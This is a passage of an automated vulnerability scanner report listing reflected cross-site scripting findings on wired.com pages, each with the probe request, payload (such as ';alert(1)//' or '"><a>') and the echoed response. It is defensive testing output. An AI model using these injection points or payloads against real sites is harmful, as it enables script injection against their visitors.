The value of the ibypid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload dc247%3balert(1)//401a89ca126 was submitted in the ibypid parameter. This input was echoed as dc247;alert(1)//401a89ca126 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /inspiredbyyou/2010/10/buy-it-or-burn-it?ibypid=12dc247%3balert(1)//401a89ca126 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/inspiredbyyou/xmlrpc.php
Last-Modified: Sun, 21 Nov 2010 23:13:45 GMT
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=438
Expires: Sun, 21 Nov 2010 23:21:03 GMT
Date: Sun, 21 Nov 2010 23:13:45 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 105655

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<script>var currentNavFrame = 12dc247;alert(1)//401a89ca126;</script>
...[SNIP]...

1.167. http://www.wired.com/inspiredbyyou/2010/10/peak-everything [ibypid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /inspiredbyyou/2010/10/peak-everything

Issue detail

The value of the ibypid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 99586%3balert(1)//29128e720c6 was submitted in the ibypid parameter. This input was echoed as 99586;alert(1)//29128e720c6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /inspiredbyyou/2010/10/peak-everything?ibypid=1399586%3balert(1)//29128e720c6 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/inspiredbyyou/xmlrpc.php
Last-Modified: Sun, 21 Nov 2010 23:14:02 GMT
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=480
Expires: Sun, 21 Nov 2010 23:22:02 GMT
Date: Sun, 21 Nov 2010 23:14:02 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 113826

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<script>var currentNavFrame = 1399586;alert(1)//29128e720c6;</script>
...[SNIP]...

1.168. http://www.wired.com/inspiredbyyou/2010/10/turkeys-and-triumphs [ibypid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /inspiredbyyou/2010/10/turkeys-and-triumphs

Issue detail

The value of the ibypid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 8c5cb%3balert(1)//5e37e52b0bb was submitted in the ibypid parameter. This input was echoed as 8c5cb;alert(1)//5e37e52b0bb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /inspiredbyyou/2010/10/turkeys-and-triumphs?ibypid=148c5cb%3balert(1)//5e37e52b0bb HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/inspiredbyyou/xmlrpc.php
Last-Modified: Sun, 21 Nov 2010 23:13:43 GMT
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=480
Expires: Sun, 21 Nov 2010 23:21:43 GMT
Date: Sun, 21 Nov 2010 23:13:43 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 107511

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<script>var currentNavFrame = 148c5cb;alert(1)//5e37e52b0bb;</script>
...[SNIP]...

1.169. http://www.wired.com/inspiredbyyou/2010/11/avoiding-bad-holiday-albums [ibypid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /inspiredbyyou/2010/11/avoiding-bad-holiday-albums

Issue detail

The value of the ibypid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload bc9b9%3balert(1)//3b7177fe795 was submitted in the ibypid parameter. This input was echoed as bc9b9;alert(1)//3b7177fe795 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /inspiredbyyou/2010/11/avoiding-bad-holiday-albums?ibypid=15bc9b9%3balert(1)//3b7177fe795 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/inspiredbyyou/xmlrpc.php
Last-Modified: Sun, 21 Nov 2010 23:13:40 GMT
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=480
Expires: Sun, 21 Nov 2010 23:21:40 GMT
Date: Sun, 21 Nov 2010 23:13:40 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106915

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<script>var currentNavFrame = 15bc9b9;alert(1)//3b7177fe795;</script>
...[SNIP]...

1.170. http://www.wired.com/medtech [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /medtech

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e89c"><a>d3ad9ae676c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /medtech8e89c"><a>d3ad9ae676c HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29378
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:15:03 GMT
Date: Mon, 22 Nov 2010 01:11:03 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_medtech8e89c"><a>d3ad9ae676c">
...[SNIP]...

1.171. http://www.wired.com/medtech/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /medtech/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41041"><a>c86672fee37 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /medtech41041"><a>c86672fee37/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29379
Vary: Accept-Encoding
Cache-Control: max-age=220
Expires: Sun, 21 Nov 2010 20:19:52 GMT
Date: Sun, 21 Nov 2010 20:16:12 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_medtech41041"><a>c86672fee37">
...[SNIP]...

1.172. http://www.wired.com/medtech/drugs [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /medtech/drugs

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6c78"><a>e49d3eb099e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /medtechc6c78"><a>e49d3eb099e/drugs HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29393
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Sun, 21 Nov 2010 23:12:38 GMT
Date: Sun, 21 Nov 2010 23:08:38 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_medtechc6c78"><a>e49d3eb099e ss_drugs">
...[SNIP]...

1.173. http://www.wired.com/medtech/drugs [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /medtech/drugs

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c65f1"><a>11d5934ee8b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /medtech/drugsc65f1"><a>11d5934ee8b HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29393
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:19:08 GMT
Date: Sun, 21 Nov 2010 23:09:08 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_medtech ss_drugsc65f1"><a>11d5934ee8b">
...[SNIP]...

1.174. http://www.wired.com/medtech/genetics [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /medtech/genetics

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6e54"><a>33024249170 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /medtecha6e54"><a>33024249170/genetics HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29399
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Sun, 21 Nov 2010 23:12:38 GMT
Date: Sun, 21 Nov 2010 23:08:38 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_medtecha6e54"><a>33024249170 ss_genetics">
...[SNIP]...

1.175. http://www.wired.com/medtech/genetics [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /medtech/genetics

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56b5c"><a>80a5cb3973b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /medtech/genetics56b5c"><a>80a5cb3973b HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29399
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:19:15 GMT
Date: Sun, 21 Nov 2010 23:09:15 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_medtech ss_genetics56b5c"><a>80a5cb3973b">
...[SNIP]...

1.176. http://www.wired.com/medtech/health [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /medtech/health

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e0876"><a>211d7d736ef was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /medteche0876"><a>211d7d736ef/health HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29395
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Sun, 21 Nov 2010 23:12:41 GMT
Date: Sun, 21 Nov 2010 23:08:41 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_medteche0876"><a>211d7d736ef ss_health">
...[SNIP]...

1.177. http://www.wired.com/medtech/health [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /medtech/health

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed9f9"><a>5052cbc9d21 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /medtech/healthed9f9"><a>5052cbc9d21 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29395
Vary: Accept-Encoding
Cache-Control: max-age=549
Expires: Sun, 21 Nov 2010 23:18:22 GMT
Date: Sun, 21 Nov 2010 23:09:13 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_medtech ss_healthed9f9"><a>5052cbc9d21">
...[SNIP]...

1.178. http://www.wired.com/medtech/stemcells [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /medtech/stemcells

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d1ff"><a>67b5e859397 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /medtech7d1ff"><a>67b5e859397/stemcells HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29401
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Sun, 21 Nov 2010 23:12:48 GMT
Date: Sun, 21 Nov 2010 23:08:48 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_medtech7d1ff"><a>67b5e859397 ss_stemcells">
...[SNIP]...

1.179. http://www.wired.com/medtech/stemcells [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /medtech/stemcells

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32e76"><a>2f9c85fc36d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /medtech/stemcells32e76"><a>2f9c85fc36d HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29401
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:19:21 GMT
Date: Sun, 21 Nov 2010 23:09:21 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_medtech ss_stemcells32e76"><a>2f9c85fc36d">
...[SNIP]...

1.180. http://www.wired.com/multimedia [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /multimedia

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af2cd"><a>0b4232b1240 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /multimediaaf2cd"><a>0b4232b1240 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29268
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:15:57 GMT
Date: Mon, 22 Nov 2010 01:11:57 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_multimediaaf2cd"><a>0b4232b1240">
...[SNIP]...

1.181. http://www.wired.com/multimedia/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /multimedia/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e1b5"><a>d5da876dbe0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /multimedia3e1b5"><a>d5da876dbe0/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29269
Vary: Accept-Encoding
Cache-Control: max-age=236
Expires: Sun, 21 Nov 2010 20:19:58 GMT
Date: Sun, 21 Nov 2010 20:16:02 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
